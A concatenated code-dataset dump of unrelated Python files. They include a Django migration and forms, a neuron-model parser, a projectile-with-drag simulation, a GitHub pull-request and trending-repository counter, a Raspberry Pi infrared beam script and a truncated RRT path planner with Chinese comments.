('panel', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['public_lights.ElectricPanel'])),\n ('phase', self.gf('django.db.models.fields.CharField')(max_length=1)),\n ))\n db.send_create_signal(u'public_lights', ['PhaseLine'])\n\n # Adding unique constraint on 'PhaseLine', fields ['panel', 'phase']\n db.create_unique(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Adding index on 'PhaseLine', fields ['panel', 'phase']\n db.create_index(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n\n def backwards(self, orm):\n # Removing index on 'PhaseLine', fields ['panel', 'phase']\n db.delete_index(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Removing unique constraint on 'PhaseLine', fields ['panel', 'phase']\n db.delete_unique(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Deleting model 'ElectricPanel'\n db.delete_table(u'public_lights_electricpanel')\n\n # Deleting model 'ElectricPanelEvent'\n db.delete_table(u'public_lights_electricpanelevent')\n\n # Deleting model 'PhaseLine'\n db.delete_table(u'public_lights_phaseline')\n\n\n models = {\n u'public_lights.electricpanel': {\n 'Meta': {'object_name': 'ElectricPanel'},\n 'geom': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),\n 'identifier': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10', 'primary_key': 'True'}),\n 'number': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})\n },\n u'public_lights.electricpanelevent': {\n 'Meta': {'object_name': 'ElectricPanelEvent'},\n 'device': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['public_lights.ElectricPanel']\"}),\n 'extra': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'status': ('django.db.models.fields.CharField', [], {'max_length': '15'}),\n 'time': ('django.db.models.fields.DateTimeField', [], {})\n },\n u'public_lights.phaseline': {\n 'Meta': {'unique_together': \"(('panel', 'phase'),)\", 'object_name': 'PhaseLine', 'index_together': \"[['panel', 'phase']]\"},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'panel': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['public_lights.ElectricPanel']\"}),\n 'phase': ('django.db.models.fields.CharField', [], {'max_length': '1'})\n }\n }\n\n complete_apps = ['public_lights']\n","sub_path":"migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351375092","text":"import sys\nimport logging\nimport inspect\n\nimport numpy as np\nimport sympy as sp\n\nimport ANNarchy_future.api as api\nimport ANNarchy_future.parser as parser\n\n\nclass NeuronParser(object):\n \"\"\"Neuron parser.\n\n Attributes:\n neuron (api.Neuron): Neuron class.\n name (str): name of the Neuron class.\n attributes (list): list of attributes (parameters and variables).\n parameters (list): list of parameters.\n variables (list): list of variables.\n inputs (list): list of input variables (conductances).\n outputs (list): list of output variables (firing rate).\n update_equations (list): update equations.\n spike_condition (Condition): spike condition.\n reset_equations (list): reset equations.\n \"\"\"\n\n def __init__(self, neuron:'api.Neuron'):\n\n \"\"\"Initializes the parser.\n\n Sets:\n\n * `self.neuron`\n * `self.name`\n \"\"\"\n\n self.neuron = neuron\n self._spiking = False\n self.name = self.neuron.__class__.__name__\n\n # Logging\n self._logger = logging.getLogger(__name__)\n self._logger.debug(\"Neuron parser created.\")\n\n # Attributes\n self.attributes = []\n self.parameters = []\n self.variables = []\n self.shared = []\n self.inputs = []\n self.outputs = []\n\n # Equations to retrieve\n self.update_equations = []\n self.update_dependencies = []\n self.spike_condition = []\n self.spike_dependencies = []\n self.reset_equations = []\n self.reset_dependencies = []\n\n def is_spiking(self) -> bool:\n \"Returns True if the Neuron class is spiking.\"\n\n return self._spiking\n\n def extract_variables(self):\n\n \"\"\"Iterates over `neuron.__dict__` and extracts all `Parameter()` and `Variable()` instances.\n\n Sets:\n\n * `self._spiking`\n * `self.attributes`\n * `self.parameters`\n * `self.variables`\n * `self.shared`\n * `self.inputs`\n * `self.outputs`\n\n \"\"\"\n\n # List attributes\n current_attributes = list(self.neuron.__dict__.keys())\n\n for attr in current_attributes:\n var = getattr(self.neuron, attr)\n # Parameter\n if isinstance(var, (api.Parameter, )):\n self.parameters.append(attr)\n self.attributes.append(attr)\n # Variable\n if isinstance(var, (api.Variable, )):\n self.variables.append(attr)\n self.attributes.append(attr)\n if var in self.neuron._inputs:\n self.inputs.append(attr)\n if var in self.neuron._outputs:\n self.outputs.append(attr)\n\n # Shared variables\n for attr in self.attributes:\n if getattr(self.neuron, attr)._shared:\n self.shared.append(attr)\n\n # Get lists of parameters and variables\n self._logger.info(\"Attributes: \" + str(self.attributes))\n self._logger.info(\"Parameters: \" + str(self.parameters))\n self._logger.info(\"Variables: \" + str(self.variables))\n\n # Set the attributes to the neuron\n self.neuron.attributes = self.attributes\n self.neuron._parser = self\n\n def analyse_equations(self):\n\n \"\"\"Analyses the neuron equations.\n\n Calls update(), spike() and reset() to retrieve the `Equations` objects.\n\n Sets:\n\n * `self.update_equations`\n * `self.spike_condition`\n * `self.reset_equations`\n\n \"\"\"\n\n # List of methods\n callables = [f for f in dir(self.neuron) if callable(getattr(self.neuron, f))]\n\n # Analyse update()\n if 'update' in callables:\n\n self._logger.info(\"Calling Neuron.update().\")\n\n signature = inspect.signature(self.neuron.update)\n if 'method' in signature.parameters.keys():\n method = signature.parameters['method'].default\n if not method in parser.Config.numerical_methods:\n self._logger.error(self.name+\".update(): \"+ method + \" is not available.\")\n sys.exit(1)\n else:\n method = 'euler'\n try:\n with self.neuron.Equations(method=method) as n:\n self.neuron.update(n)\n except Exception:\n self._logger.exception(\"Unable to analyse \" + self.name + \".update()\")\n sys.exit(1)\n\n self.update_equations, self.update_dependencies = self.process_equations(self.neuron._current_eq)\n self.neuron._current_eq = []\n\n # For spiking neurons only\n if 'spike' in callables:\n\n self._logger.info(\"Neuron has a spike() method.\")\n self._spiking = True\n\n self._logger.info(\"Calling Neuron.spike().\")\n \n # Analyse spike()\n try:\n with self.neuron.Equations() as n:\n self.neuron.spike(n)\n except Exception:\n self._logger.exception(\"Unable to analyse spike().\")\n sys.exit(1)\n\n self.spike_condition, self.spike_dependencies = self.process_condition(self.neuron._current_eq)\n self.neuron._current_eq = []\n \n # Analyse reset()\n self._logger.info(\"Calling Neuron.reset().\")\n try:\n with self.neuron.Equations() as n:\n self.neuron.reset(n)\n except Exception:\n self._logger.exception(\"Unable to analyse reset().\")\n sys.exit(1)\n\n self.reset_equations, self.reset_dependencies = self.process_equations(self.neuron._current_eq)\n self.neuron._current_eq = []\n\n # Collect random variables\n if hasattr(self.neuron, '_random_variables'):\n self.random_variables = self.neuron._random_variables\n else:\n self.random_variables = {}\n\n def process_condition(self, equations) -> 'parser.Condition':\n\n if len(equations) > 1:\n self._logger.error(\"Neuron.spike() must define only one Equations context.\")\n raise SyntaxError()\n\n name, eq = equations[0].equations[0]\n\n condition = parser.Condition(self.neuron, name, eq)\n condition.parse()\n\n return condition, condition._dependencies\n\n def process_equations(self, equations) -> list:\n \n \"\"\"Checks all declared equations and applies a numerical method if necessary.\n \n Args:\n equations: list of Equations objects.\n\n Returns:\n a list of blocks, which are lists of equations of three types: assignments, ODEs and conditions.\n \n \"\"\"\n dependencies = []\n blocks = parser.get_blocks(self, equations)\n\n for block in blocks:\n block.dependencies()\n for dep in block._dependencies:\n dependencies.append(dep)\n block.parse()\n\n dependencies = list(set(dependencies))\n\n return blocks, dependencies\n\n def __str__(self):\n\n code = \"\"\n\n code += \"Parameters: \" + str(self.parameters) + \"\\n\"\n code += \"Variables: \" + str(self.variables) + \"\\n\\n\"\n\n code += \"Neural equations:\\n\"\n for block in self.update_equations:\n code += block.raw()\n\n if self._spiking:\n code += \"\\nSpike emission:\\n\"\n code += self.spike_condition.raw() + \"\\n\"\n\n code += \"\\nReset equations:\\n\"\n for block in self.reset_equations:\n code += block.raw()\n\n return code\n","sub_path":"ANNarchy_future/parser/NeuronParser.py","file_name":"NeuronParser.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112577096","text":"from gpkit import Variable, Monomial\nimport numpy as np\n\nfrom robust.robust_gp_tools import RobustGPTools\n\n\ndef test_check_if_no_data():\n for _ in xrange(100):\n number_of_monomials = int(50*np.random.random())+1\n number_of_gp_variables = int(np.random.rand()*20) + 1\n number_of_uncertain_variables = int(np.random.rand()*5) + 1\n vector_to_choose_from = [0, 0, 0, 0, 0, 0, 0, 0, 1, -1]\n\n m = number_of_monomials*[1]\n p_uncertain_vars = []\n data_monomials = []\n\n for j in xrange(number_of_monomials):\n for i in xrange(number_of_gp_variables):\n x = Variable('x_%s' % i)\n m[j] *= x**(np.random.rand()*10 - 5)\n\n for i in xrange(number_of_uncertain_variables):\n u = Variable('u_%s' % i, np.random.random(), pr=100*np.random.random())\n p_uncertain_vars.append(u)\n neg_pos_neutral_powers = [vector_to_choose_from[int(10*np.random.random())] for _ in xrange(number_of_monomials)]\n\n for j in xrange(number_of_monomials):\n m[j] *= u**(np.random.rand()*5*neg_pos_neutral_powers[j])\n if neg_pos_neutral_powers[j] != 0:\n data_monomials.append(j)\n\n for i in xrange(number_of_monomials):\n if i in data_monomials:\n # noinspection PyUnresolvedReferences\n assert (not RobustGPTools.check_if_no_data(p_uncertain_vars, m[i].exps[0]))\n else:\n # noinspection PyUnresolvedReferences\n assert (RobustGPTools.check_if_no_data(p_uncertain_vars, m[i].exps[0]))\n\n\ndef test():\n test_check_if_no_data()\n","sub_path":"robust/testing/t_robust_gp_tools.py","file_name":"t_robust_gp_tools.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212778323","text":"from django.urls import path\n\nfrom .views import(\n article_list,\n article_detail,\n article_create,\n)\n\napp_name = 'articles'\n\nurlpatterns = [\n path('', article_list, name='article-list'),\n path('create/', article_create, name='article-create'),\n path('', article_detail, name='article-detail'),\n]\n","sub_path":"articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337713244","text":"# This file is part of VertNet: https://github.com/VertNet/webapp\n#\n# VertNet is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# VertNet is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with VertNet. If not, see: http://www.gnu.org/licenses\n\n\"\"\"API methods configuration file.\n\"\"\"\nLAST_UPDATED = '2016-05-20T10:11:43+CEST'\n\n# Versions\nUTIL_VERSION = 'util.py 2016-05-13T12:38:30+CEST'\n\n# Download variables\n\n# limit on documents in a search result: rows per file\nSEARCH_CHUNK_SIZE = 1000\n# See api_cnt_performance_analysis.pdf at https://goo.gl/xbLIGz\nOPTIMUM_CHUNK_SIZE = 500\n# limit on the number of files in a single compose request\nCOMPOSE_FILE_LIMIT = 32\n# limit on the number of files in a composition\nCOMPOSE_OBJECT_LIMIT = 1024\n# bucket for temp compositions\nTEMP_BUCKET = 'vn-dltest'\n# production bucket for downloads\nDOWNLOAD_BUCKET = 'vn-downloads2'\nFILE_EXTENSION = 'tsv'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"58406360","text":"from django import forms\n\n\nclass ContactForm(forms.Form):\n name = forms.CharField(required=True, label='Nombre', max_length=50, min_length=2, widget=forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Escribe tu nombre'\n }\n ))\n email = forms.EmailField(required=True, label='Email', max_length=100, widget=forms.EmailInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Escribe tu email'\n }\n ))\n content = forms.CharField(required=True, label='Contenido', max_length=200, widget=forms.Textarea(\n attrs={\n 'class': 'form-control',\n 'rows': 3,\n 'placeholder': 'Escribe tu mensaje...'\n }\n ))\n","sub_path":"webempresa/contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180863454","text":"from pylab import *\nimport math\n\n# Physical constants\ng = 9.8\nm = 1.0\nrho = 1.0\nCd = 1.0\nA = math.pi * pow(0.01, 2.0)\nalpha = rho * Cd * A / 2.0\nbeta = alpha / m\n\n# Initial conditions\nX0 = 1.0\nY0 = 0.0\nVx0 = 70.0\nVy0 = 80.0\n\n# Time steps\nsteps = 1000\nt_HIT = 2.0*Vy0/g\ndt = t_HIT / steps\n\n# No drag\nX_ND = list()\nY_ND = list()\n\nfor i in arange(steps+1):\n X_ND.append(X0 + Vx0 * dt * i)\n Y_ND.append(Y0 + Vy0 * dt * i - 0.5 * g * pow(dt * i, 2.0))\n\n# With drag\nX_WD = list()\nY_WD = list()\nVx_WD = list()\nVy_WD = list()\n\nfor i in arange(steps+1):\n X_ND.append(X0 + Vx0 * dt * i)\n Y_ND.append(Y0 + Vy0 * dt * i - 0.5 * g * pow(dt * i, 2.0))\n\n# With drag\nX_WD = list()\nY_WD = list()\nVx_WD = list()\nVy_WD = list()\n\nX_WD.append(X0)\nY_WD.append(Y0)\nVx_WD.append(Vx0)\nVy_WD.append(Vy0)\n\nstop = 0\nfor i in range(1,steps+1):\n if stop != 1:\n speed = pow(pow(Vx_WD[i-1],2.0)+pow(Vy_WD[i-1],2.0),0.5)\n\n # First calculate velocity\n Vx_WD.append(Vx_WD[i-1] * (1.0 - beta * speed * dt))\n Vy_WD.append(Vy_WD[i-1] + (- g - beta * Vy_WD[i-1] * speed) * dt)\n\n # Now calculate position\n X_WD.append(X_WD[i-1] + Vx_WD[i-1] * dt)\n Y_WD.append(Y_WD[i-1] + Vy_WD[i-1] * dt)\n\n # Stop if hits ground\n if Y_WD[i] <= 0.0:\n stop = 1\n\n# Plot results\nplot(X_ND, Y_ND)\nplot(X_WD, Y_WD)\nshow()\n","sub_path":"lab5/PMwAR.py","file_name":"PMwAR.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269733075","text":"#\n# @lc app=leetcode.cn id=856 lang=python3\n#\n# [856] 括号的分数\n#\n# https://leetcode-cn.com/problems/score-of-parentheses/description/\n#\n# algorithms\n# Medium (60.97%)\n# Likes: 162\n# Dislikes: 0\n# Total Accepted: 10.8K\n# Total Submissions: 17.7K\n# Testcase Example: '\"()\"'\n#\n# 给定一个平衡括号字符串 S,按下述规则计算该字符串的分数:\n# \n# \n# () 得 1 分。\n# AB 得 A + B 分,其中 A 和 B 是平衡括号字符串。\n# (A) 得 2 * A 分,其中 A 是平衡括号字符串。\n# \n# \n# \n# \n# 示例 1:\n# \n# 输入: \"()\"\n# 输出: 1\n# \n# \n# 示例 2:\n# \n# 输入: \"(())\"\n# 输出: 2\n# \n# \n# 示例 3:\n# \n# 输入: \"()()\"\n# 输出: 2\n# \n# \n# 示例 4:\n# \n# 输入: \"(()(()))\"\n# 输出: 6\n# \n# \n# \n# \n# 提示:\n# \n# \n# S 是平衡括号字符串,且只含有 ( 和 ) 。\n# 2 <= S.length <= 50\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def scoreOfParentheses(self, S: str) -> int:\n stack = [0] #The score of the current frame\n\n for x in S:\n if x == '(':\n stack.append(0)\n else:\n v = stack.pop()\n stack[-1] += max(2 * v, 1)\n\n return stack.pop()\n# @lc code=end\n\n","sub_path":"856.括号的分数.py","file_name":"856.括号的分数.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285544666","text":"def Fibonachi1(n):\n n_prev,n_prev_prev=1,1\n for i in range(2,n):\n n_prev_prev,n_prev= n_prev,n_prev + n_prev_prev\n return n_prev\n\ndef memoize(f):\n memo = {}\n def helper(x):\n if x not in memo: \n memo[x] = f(x)\n return memo[x]\n return helper\n \n@memoize\ndef fib(n):\n if n<0:\n raise ValueError(\"Wrong number\")\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n\nprint (fib(-1)) ","sub_path":"old/other/nThFibon.py","file_name":"nThFibon.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403964726","text":"import numpy as np\nimport pandas as pd\nimport settings\nimport matplotlib.pyplot as plt\n\n\nfrom collections import defaultdict\nfrom github import Github\n\ndef get_prs(repo, pivotal_members):\n pr_count = defaultdict(int)\n\n for prs in repo.get_pulls('all'):\n\n if is_pivot(prs.user.login, pivotal_members):\n continue\n\n created = prs.created_at\n created = created.replace(hour=0, minute=0, second=0, microsecond=0) # squash it down to the date\n pr_count[created] += 1\n\n dates, occurances = list(pr_count.keys()), list(pr_count.values())\n\n return np.array(dates, dtype=np.datetime64), np.array(occurances), pr_count\n\n\ndef is_pivot(login, pivotal_member):\n for member in pivotal_member:\n if login == member.login:\n return True\n if login == 'dependabot':\n return True\n\n return False\n\n\nif __name__ == \"__main__\":\n\n print(\"Spinning up the radar...connecting to GitHub\")\n g = Github(settings.GH_KEY)\n org = g.get_organization(settings.ORGANIZATION)\n pivotal_members = []\n\n for team in org.get_teams(): \n print\n if team.name == 'Pivotal':\n pivotal_members = [member for member in team.get_members()]\n\n repos = [org.get_repo(x) for x in settings.REPOS]\n\n print(\"Scanning data in {}\".format(settings.ORGANIZATION))\n\n totals_dict = defaultdict(int)\n for repo in repos:\n print(\"Scanning {}\".format(repo.full_name))\n\n array_dates, array_occurances, pr_counts = get_prs(repo, pivotal_members)\n\n for key, value in pr_counts.items():\n totals_dict[key] += value\n\n df = pd.DataFrame(totals_dict.items())\n df.columns = ['Date', 'PRs']\n df = df.set_index(df['Date'])\n df.index = pd.to_datetime(df.index)\n\n g = df.groupby(pd.Grouper(freq=\"M\"))\n g = g.sum()\n\n plt.figure(figsize=(12, 16), dpi=100)\n ax = g.plot.line()\n ax.set_title(\"Concourse # of PRs per Year\")\n ax.set_ylabel(\"# PRs per month\")\n ax.set_xlabel(\"Date\")\n ax.grid()\n\n plt.savefig('test.png', dpi=100)\n plt.show()\n\n print(g)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364684079","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\n\nBeam1 = 4 \nLED = 17\nt = 0.05\n \nGPIO.setup(Beam1, GPIO.IN)\nGPIO.setup(LED, GPIO.OUT)\n\nfor index in range(1000):\n if(GPIO.input(Beam1) == True):\n print(\"Solid\")\n GPIO.output(LED, False)\n else:\n print(\"Beam Broken\")\n GPIO.output(LED, True)\n time.sleep(t)\n\nprint(\"Done\")\nGPIO.cleanup()\n","sub_path":"IR.py","file_name":"IR.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"456908958","text":"import requests\nfrom datetime import date, timedelta\n\n\ndef get_trending_repositories(top_size):\n repos_url = 'https://api.github.com/search/repositories'\n datetime_week_ago = (date.today() - timedelta(days=7)).strftime('%Y-%m-%d')\n created_last_week = 'created:>={}'.format(datetime_week_ago)\n params = {\n 'q': created_last_week,\n 'sort': 'stars',\n 'per_page': top_size\n }\n trending_repos = requests.get(repos_url, params=params)\n top_github_repos = trending_repos.json()['items']\n return top_github_repos\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n repo_url = 'https://api.github.com/repos/{}/{}/issues'.format(\n repo_owner,\n repo_name\n )\n issues = requests.get(repo_url)\n return len(issues.json())\n\n\ndef show_top_repo_info(top_number, repo_name, repo_issues, repo_url, repo_stars):\n print('#{}\\nName: {}\\nStars: {}\\nIssues: {}\\nUrl: {}\\n'.format(\n top_number,\n repo_name,\n repo_stars,\n repo_issues,\n repo_url\n ))\n\n\nif __name__ == '__main__':\n print('Top 20 of Github repositories by stars for the last week:\\n')\n top_size = 20\n top_github_repos = get_trending_repositories(top_size)\n for top_number, repo in list(enumerate(top_github_repos, start=1)):\n repo_name = repo['name']\n repo_owner = repo['owner']['login']\n repo_url = repo['url']\n repo_stars = repo['stargazers_count']\n repo_issues = get_open_issues_amount(\n repo_owner,\n repo_name\n )\n show_top_repo_info(\n top_number,\n repo_name,\n repo_issues,\n repo_url,\n repo_stars\n )","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605587920","text":"\"\"\"\nRRT算法与Halton序列结合,把节点扩展的随机过程用Halton序列\n\"\"\"\nimport math\nimport random\nimport time\nfrom NewRRT.LeeDrawer import draw_results\n\nfrom shapely.geometry import LineString, Point\n\nfrom NewRRT import InverseSequence\nfrom NewRRT.LeeHalton import LeeHalton\nfrom sobol_seq import sobol_seq\n\n\nclass LeeRRTPlanner():\n def __init__(self):\n super(LeeRRTPlanner,self).__init__()\n\n def initialise(self,environment,bounds,start_pose,goal_region,object_radius,steer_distance,num_iterations,resolution,runForFullIterations):\n \"\"\"\n 初始化参数\n environment: 障碍物环境\n bounds: 路径边界\n start_pose:起点\n goal_refion: 目标区域\n object_radius: 对象半径\n steer_distance: 步长\n num_iterations: 迭代次数\n resolution:\n :return:\n \"\"\"\n self.env = environment\n self.obstacles = environment.obstacles\n self.bounds = bounds\n self.minx, self.miny, self.minz, self.maxx, self.maxy, self.maxz = bounds\n self.start_pose = start_pose\n self.goal_region = goal_region\n self.obj_radius = object_radius\n self.N = num_iterations\n\n self.resolution = resolution\n self.steer_distance = steer_distance\n\n self.V = set() # 建立空集存储节点\n self.E = set() # 建立空集存储随机树\n\n self.child_to_parent_dict = dict()\n self.runForFullIterations = runForFullIterations\n self.goal_pose = self.Centroid(goal_region)\n # self.goal_pose = (goal_region.centroid.coords[0]) # 目标点\n\n def RRT(self,environment,bounds,start_pose,goal_region,object_radius,steer_distance,num_iterations,resolution, drawResults, runForFullIterations, RRT_Flavour = \"RRT\"):\n self.env = environment\n self.random_i = 0\n\n self.initialise(environment, bounds, start_pose, goal_region,object_radius, steer_distance, num_iterations,resolution, runForFullIterations)\n\n x0,y0,z0 = start_pose\n x1,y1,z1 = self.Centroid(goal_region)\n start = (x0,y0,z0) # 起点\n goal = (x1,y1,z1) # 终点\n elapsed_time = 0 # 运行时间\n path=[] # 存储路径\n\n # 考虑特殊情况\n if start == goal:\n path = [start,goal]\n self.V.union([start,goal])\n self.E.union([(start, goal)])\n # 判断是否有从起点直通终点的路径,且该路径中间是否经过障碍物\n elif self.isEdgeCollisionFree(start,goal):\n path = [start,goal] # 说明有一条路径从起点直通终点且不经过障碍物\n self.V.union([start, goal])\n self.E.union([(start, goal)])\n\n # 运行RRT算法\n else:\n if RRT_Flavour == \"RRT\":\n start_time = time.time() # 记录该算法的开始时间\n path = self.RRTSearch() # 开始进行路径搜索\n elapsed_time = time.time()-start_time # 计算算法运行时间\n\n # 画出路径\n if path and drawResults:\n draw_results(\"RRT\", path, self.V, self.E, environment, bounds, object_radius, resolution, start_pose,\n goal_region, elapsed_time)\n\n return path # 返回路径\n\n\n\n\n\n def RRTSearch(self):\n \"\"\"\n RRT路径搜索算法\n :return:\n \"\"\"\n path = [] # 定义路径\n path_length = float('inf') # 路径默认值为正无穷\n tree_size = 0\n path_size = 0\n self.V.add(self.start_pose) # start_pose肯定是路径中的一个节点那么将其加入路径中\n # goal_centroid = self.get_centroid(self.goal_region) # 获取目标图形的形心,该函数z坐标不确定对不对\n goal_centroid = self.Centroid(self.goal_region)\n\n # 迭代采样过程\n for i in range(self.N):\n if i >= self.N-1:\n self.runForFullIterations == True # 意思是迭代完了\n if(random.random()>=1.95): # 这种情况不会存在\n random_point = goal_centroid\n else:\n # 采集随机点\n random_point = self.get_cillision_free_random_point()\n nearest_point = self.find_nearest_point(random_point)\n new_point = self.steer(nearest_point,random_point)\n if self.isEdgeCollisionFree(nearest_point,new_point):\n self.V.add(new_point)\n self.E.add((nearest_point,new_point))\n self.setParent(nearest_point,new_point) # 设置nearest_point 为 new_point\n\n if self.isAtGoalRegion(new_point):\n if not self.runForFullIterations:\n path,tree_size,path_size,path_length = self.find_path(self.start_pose,new_point)\n break\n else:\n tmp_path, tmp_tree_size, tmp_path_size, tmp_path_length = self.find_path(self.start_pose,\n new_point)\n if tmp_path_length < path_length:\n path_length = tmp_path_length\n path = tmp_path\n tree_size = tmp_tree_size\n path_size = tmp_path_size\n\n uniPruningPath = self.uniPruning(path) # 这里是剪枝操作\n # If no path is found, then path would be an empty list. 如果没有路径那么path应该是空列表。\n return [path, uniPruningPath]\n\n\n\n\n\n\n\n\n def Centroid(self,point_region):\n \"\"\"\n 获取立体图形的中心\n :return:\n \"\"\"\n x = (point_region[2][0] - point_region[0][0]) / 2 + point_region[0][0]\n y = (point_region[1][1] - point_region[0][1]) / 2 + point_region[0][1]\n z = (point_region[4][2] - point_region[0][2]) / 2 + point_region[0][2]\n return (x, y, z)\n\n def uniPruning(self,path):\n \"\"\"\n 剪枝操作\n :param path: 路径\n :return:\n \"\"\"\n unidirectionalPath = [path[0]] # 起点\n pointTem = path[0] # 起点\n for i in range(3, len(path)): # 去掉起点,终点\n # pointTem,path[i] 两个点连线没有障碍物\n if not self.isEdgeCollisionFree(pointTem, path[i]):\n pointTem = path[i - 1]\n unidirectionalPath.append(pointTem)\n unidirectionalPath.append(path[-1]) # path[-1] 代表path 的最后一个值\n return unidirectionalPath\n\n\n def find_path(self,start_point,end_point):\n \"\"\"\n 从随机节点中选出路径\n :param start_point:\n :param end_point:\n :return:\n \"\"\"\n path = [end_point]\n tree_size, path_size, path_length = len(self.V), 1, 0 # tree_size 树的大小\n current_node = end_point # 当前节点就是新加入的节点\n previous_node = None\n target_node = start_point # 从末端点到起点,起点就是目标点\n while current_node != target_node:\n parent = self.getParent(current_node) # 寻找当前节点前一个节点(父节点)\n path.append(parent) # 插入新点\n previous_node = current_node\n current_node = parent # 当前节点变成向目标点进一步的节点\n path_length += self.euclidian_dist(current_node, previous_node) # 两节点的距离,目的是求得整个路径的长度\n path_size += 1 # 计算节点个数\n path.reverse() # 反向列表中的元素,因为是逆序找的\n return path, tree_size, path_size, path_length\n\n def isAtGoalRegion(self,point):\n \"\"\"\n 判断新点是否到达目标区域\n :param point:\n :return:\n \"\"\"\n # buffered_point = Point(point).buffer(self.obj_radius, self.resolution)\n # intersection = buffered_point.intersection(self.goal_region) # 返回几何图形的交集\n # inGoal = intersection.area / buffered_point.area # area几何的无单位面积\n # return inGoal >= 0.5 # 原始定为0.5\n # return inGoal >= 0.01\n\n return self.euclidian_dist(point,self.goal_pose) <= 3.9 # 这里不能这么大\n\n\n\n\n\n\n def getParent(self, vertex):\n \"\"\"\n 返回父节点\n :param vertex:\n :return:\n \"\"\"\n return self.child_to_parent_dict[vertex]\n\n def setParent(self,parent,child):\n \"\"\"\n 设置父节点\n :return:\n \"\"\"\n self.child_to_parent_dict[child] = parent\n\n def steer(self,from_point,to_point):\n \"\"\"\n 根据步长确定新增节点\n :param from_point:最近节点(线段起点)\n :param to_point: 随机点(线段终点)\n :return:\n \"\"\"\n fromPoint_buffered = Point(from_point).buffer(self.obj_radius, self.resolution)\n toPoint_buffered = Point(to_point).buffer(self.obj_radius, self.resolution)\n if fromPoint_buffered.distance(toPoint_buffered) < self.steer_distance: # 两点之间的距离小于步长\n return to_point\n else: # 以步长为长度扩展节点\n from_x,from_y,from_z = from_point\n to_x,to_y,to_z = to_point\n new_pointx = (to_x-from_x)*self.steer_distance/fromPoint_buffered.distance(toPoint_buffered) + from_x\n new_pointy = (to_y - from_y) * self.steer_distance / fromPoint_buffered.distance(toPoint_buffered) + from_y\n new_pointz = (to_x - from_z) * self.steer_distance / fromPoint_buffered.distance(toPoint_buffered) + from_z\n new_point = (new_pointx,new_pointy,new_pointz)\n return new_point\n\n\n\n\n def find_nearest_point(self,random_point):\n \"\"\"\n 寻找随机点的最近点\n\n :return: 最近点\n \"\"\"\n closest_point = None\n min_dist = float('inf')\n for vertex in self.V:\n # self.V 包含随机树上所有节点\n euc_dist = self.euclidian_dist(random_point, vertex)\n if euc_dist < min_dist:\n min_dist = euc_dist\n closest_point = vertex\n return closest_point\n\n\n def get_cillision_free_random_point(self):\n \"\"\"\n 找到一个不在障碍物里的可用随机点\n :return: 可用随机点\n \"\"\"\n # 运行直到找到一个有效的点\n while True:\n self.random_i = self.random_i +1\n point = self.get_random_point(self.random_i)\n buffered_point = Point(point).buffer(self.obj_radius,self.resolution)\n # 判断随机点是否在障碍物里\n if self.PointCollisionFree(buffered_point):\n return point\n\n def euclidian_dist(self,point1,point2):\n \"\"\"\n 计算两个点之间的距离\n :param point1:\n :param point2:\n :return:\n \"\"\"\n return math.sqrt((point2[0]-point1[0])**2 + (point2[1]-point1[1])**2 + (point2[2]-point1[1])**2)\n\n def PointCollisionFree(self,point):\n \"\"\"\n 判断点是否在障碍物里\n :return:\n \"\"\"\n for obstacle in 